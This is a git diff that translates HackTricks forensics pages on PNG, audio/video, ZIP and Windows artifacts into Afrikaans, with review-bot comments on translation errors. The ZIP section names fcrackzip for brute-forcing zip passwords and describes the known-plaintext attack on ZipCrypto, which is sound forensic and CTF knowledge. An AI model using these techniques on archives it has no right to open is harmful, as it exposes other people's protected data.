-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
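Review bot: The shared support banner is translated differently in this file than in the other files of the same patch: the added lines here read "SUBSKRIPSIEPLANNE", "amptelike PEASS & HackTricks-uitrusting", "NFT's" and "GitHub-opslagplekke", while png-tricks.md and video-and-audio-file-analysis.md keep "SUBSCRIPTION PLANS", "swag" and "NFTs", and the windows-forensics README uses "github-repos". Settle on one rendering of the banner and apply it in every file, since this block is copied verbatim across the repository. In the Trickest line the emphasis on "automate workflows" and "most advanced" was dropped in translation; keep the markers (`**werkstrome outomatiseer**`, `**mees gevorderde**`) so the rendered banner matches the English source.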
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 46a9656c5..90f1255af 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,37 +1,33 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies. +**PNG-lêers** word hoog aangeskryf in **CTF-uitdagings** vir hul **verlieslose kompressie**, wat hulle ideaal maak vir die insluiting van verborge data. Hul data kan ontleed word deur hul netwerkpakketten met behulp van hul gereedskap soos **Wireshark**, wat ingebedde inligting of anomalieë kan onthul. -For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants. +Vir die nagaan van die integriteit van PNG-lêers en die herstel van korrupte lêers, is **pngcheck** 'n noodsaaklike gereedskap wat opdraggelynfunksionaliteit bied om PNG-lêers te valideer en te diagnoseer ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wanneer lêers buite eenvoudige herstel is, bied aanlyn dienste soos [OfficeRecovery se PixRecovery](https://online.officerecovery.com/pixrecovery/) 'n webgebaseerde oplossing vir die herstel van korrupte PNG's, wat kan help om belangrike data vir CTF-deelnemers te herwin. -These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. 
+Hierdie strategieë beklemtoon die belang van 'n omvattende benadering in CTF's, waarin 'n kombinasie van analitiese gereedskap en hersteltegnieke gebruik word om verborge of verlore data te ontdek en te herwin.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
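Review bot: The Wireshark sentence in the first added paragraph is mistranslated: "Hul data kan ontleed word deur hul netwerkpakketten met behulp van hul gereedskap soos **Wireshark**" repeats "hul" three times, uses the Dutch "netwerkpakketten" rather than the Afrikaans "netwerkpakkies", and no longer says that the tool performs the dissection. Suggest staying closer to the source: "Hulpmiddels soos **Wireshark** maak dit moontlik om PNG-lêers te ontleed deur hul data binne netwerkpakkies te dissekteer, wat ingebedde inligting of anomalieë onthul." In the second paragraph the bold on "**repairing corrupted PNGs**" was dropped ("die herstel van korrupte PNG's"); keep the emphasis as in the source.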
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 135dd23f0..3b520d762 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,45 +1,41 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. +**Audio- en videobestandmanipulasie** is 'n kenmerkende aspek in **CTF-forensiese uitdagings**, wat gebruik maak van **steganografie** en metadata-analise om geheime boodskappe te verberg of te onthul. Gereedskap soos **[mediainfo](https://mediaarea.net/en/MediaInfo)** en **`exiftool`** is noodsaaklik vir die ondersoek van lêermetadata en die identifisering van inhoudstipes. -For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files. +Vir klankuitdagings steek **[Audacity](http://www.audacityteam.org/)** uit as 'n voorste gereedskap vir die besigtiging van golfvorme en die analise van spektrogramme, wat noodsaaklik is vir die ontdekking van teks wat in klank gekodeer is. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** word sterk aanbeveel vir gedetailleerde spektrogramanalise. **Audacity** maak klankmanipulasie soos vertraging of omkeer van spore moontlik om verborge boodskappe op te spoor. **[Sox](http://sox.sourceforge.net/)**, 'n opdraglyn-hulpprogram, blink uit in die omskakeling en redigering van klanklêers. 
-**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**. +**Least Significant Bits (LSB)**-manipulasie is 'n algemene tegniek in klank- en videosteganografie, wat gebruik maak van die vaste-grootte brokkies van mediabestande om data heimlik in te bed. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is nuttig vir die ontsluiting van boodskappe wat versteek is as **DTMF-tone** of **Morsekode**. -Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions. +Videouitdagings behels dikwels houerformate wat klank- en videostrome saambind. **[FFmpeg](http://ffmpeg.org/)** is die go-to-gereedskap vir die analise en manipulasie van hierdie formate, wat in staat is om inhoud te demultipleks en af te speel. Vir ontwikkelaars integreer **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg se vermoëns in Python vir gevorderde skriptbare interaksies. -This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files. +Hierdie verskeidenheid gereedskap beklemtoon die veelsydigheid wat vereis word in CTF-uitdagings, waar deelnemers 'n breë spektrum van analise- en manipulasietegnieke moet gebruik om verborge data binne klank- en videobestande te ontbloot. 
-## References +## Verwysings * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
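Review bot: Terminology is inconsistent inside the added paragraphs: "Audio- en videobestandmanipulasie", "mediabestande" and "videobestande" use the Dutch "bestand", while the same text uses the Afrikaans "lêer" in "lêermetadata" and "klanklêers". Use "lêer" throughout ("Klank- en videolêermanipulasie", "medialêers", "videolêers"). Smaller points in the same hunk: "Videouitdagings" needs the hyphen Afrikaans places between colliding vowels ("Video-uitdagings"), and "die go-to-gereedskap" is an untranslated anglicism ("die aangewese hulpmiddel").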
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 16b905ce3..a3c42109c 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,44 +1,44 @@ -# ZIPs tricks +# ZIP-truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities: +**Opdraglynhulpmiddels** vir die bestuur van **zip-lêers** is noodsaaklik vir die diagnose, herstel en kraak van zip-lêers. Hier is 'n paar sleutelhulpprogramme: -- **`unzip`**: Reveals why a zip file may not decompress. -- **`zipdetails -v`**: Offers detailed analysis of zip file format fields. -- **`zipinfo`**: Lists contents of a zip file without extracting them. -- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters. +- **`unzip`**: Onthul waarom 'n zip-lêer nie gedekomprimeer kan word nie. +- **`zipdetails -v`**: Bied 'n gedetailleerde analise van die velds van die zip-lêerformaat. +- **`zipinfo`**: Lys die inhoud van 'n zip-lêer sonder om dit uit te pak. +- **`zip -F input.zip --out output.zip`** en **`zip -FF input.zip --out output.zip`**: Probeer om beskadigde zip-lêers te herstel. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: 'n Hulpmiddel vir bruto-kragkraak van zip-wagwoorde, effektief vir wagwoorde tot ongeveer 7 karakters. -The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files. +Die [Zip-lêerformaat spesifikasie](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) bied omvattende besonderhede oor die struktuur en standaarde van zip-lêers. -It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. 
Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data. +Dit is belangrik om daarop te let dat wagwoord-beskermde zip-lêers **nie lêernaam of lêergroottes versleutel nie**, 'n veiligheidsgebrek wat nie gedeel word met RAR- of 7z-lêers wat hierdie inligting versleutel nie. Verder is zip-lêers wat met die ouer ZipCrypto-metode versleutel is, vatbaar vir 'n **platte tekst-aanval** as 'n onversleutelde kopie van 'n saamgedrukte lêer beskikbaar is. Hierdie aanval maak gebruik van die bekende inhoud om die wagwoord van die zip te kraak, 'n kwesbaarheid wat in [HackThis se artikel](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) beskryf word en verder verduidelik word in [hierdie akademiese artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Tog is zip-lêers wat met **AES-256**-versleuteling beveilig is, immuun teen hierdie platte tekst-aanval, wat die belangrikheid van die keuse van veilige versleutelingsmetodes vir sensitiewe data beklemtoon. -## References +## Verwysings * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
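Review bot: Two grammar errors in the added paragraphs: "die velds van die zip-lêerformaat" should be "die velde" (plural of veld), and "nie lêernaam of lêergroottes versleutel nie" loses the plural of the source ("filenames"), so it should read "nie lêername of lêergroottes versleutel nie". "Platte tekst-aanval" is a Dutch rendering of plaintext attack; either use the Afrikaans cryptographic term "klaarteks-aanval" or keep "plaintext attack" in English as the two linked articles do. Likewise "bruto-kragkraak" for brute-force cracking reads as a calque; "brute-krag-kraak" or simply "brute-force" is clearer to the reader.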
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 2b8d2400b..214f6f774 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -1,526 +1,494 @@ -# Windows Artifacts +# Windows Artefakte -## Windows Artifacts +## Windows Artefakte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Generic Windows Artifacts +## Generiese Windows Artefakte -### Windows 10 Notifications +### Windows 10 Kennisgewings -In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary). +In die pad `\Users\\AppData\Local\Microsoft\Windows\Notifications` kan jy die databasis `appdb.dat` (voor Windows-verjaarsdag) of `wpndatabase.db` (na Windows-verjaarsdag) vind. -Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data. +Binne hierdie SQLite-databasis kan jy die `Notification`-tabel vind met al die kennisgewings (in XML-formaat) wat moontlik interessante data kan bevat. -### Timeline +### Tydlyn -Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications. +Tydlyn is 'n Windows-kenmerk wat 'n **chronologiese geskiedenis** van besoekte webbladsye, bewerkte dokumente en uitgevoerde toepassings bied. -The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). +Die databasis bly in die pad `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Hierdie databasis kan geopen word met 'n SQLite-hulpmiddel of met die hulpmiddel [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **wat 2 lêers genereer wat geopen kan word met die hulpmiddel** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). 
-### ADS (Alternate Data Streams) +### ADS (Alternatiewe Datastrome) -Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded. +Gedownloade lêers kan die **ADS Zone.Identifier** bevat wat aandui **hoe** dit van die intranet, internet, ens. afgelaai is. Sommige sagteware (soos webblaaier) plaas gewoonlik selfs **meer** **inligting** soos die **URL** waarvandaan die lêer afgelaai is. -## **File Backups** +## **Lêerback-ups** -### Recycle Bin +### Herwinbin -In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\ -When a file is deleted in this folder 2 specific files are created: +In Vista/Win7/Win8/Win10 kan die **Herwinbin** in die **`$Recycle.bin`**-map in die hoof van die aandrywing (`C:\$Recycle.bin`) gevind word.\ +Wanneer 'n lêer in hierdie map uitgevee word, word 2 spesifieke lêers geskep: -* `$I{id}`: File information (date of when it was deleted} -* `$R{id}`: Content of the file +* `$I{id}`: Lêerinligting (datum van uitvee} +* `$R{id}`: Inhoud van die lêer ![](<../../../.gitbook/assets/image (486).png>) -Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10). - +Met hierdie lêers kan jy die hulpmiddel [**Rifiuti**](https://github.com/abelcheung/rifiuti2) gebruik om die oorspronklike adres van die uitgevee lêers en die datum waarop dit uitgevee is, te kry (gebruik `rifiuti-vista.exe` vir Vista - Win10). 
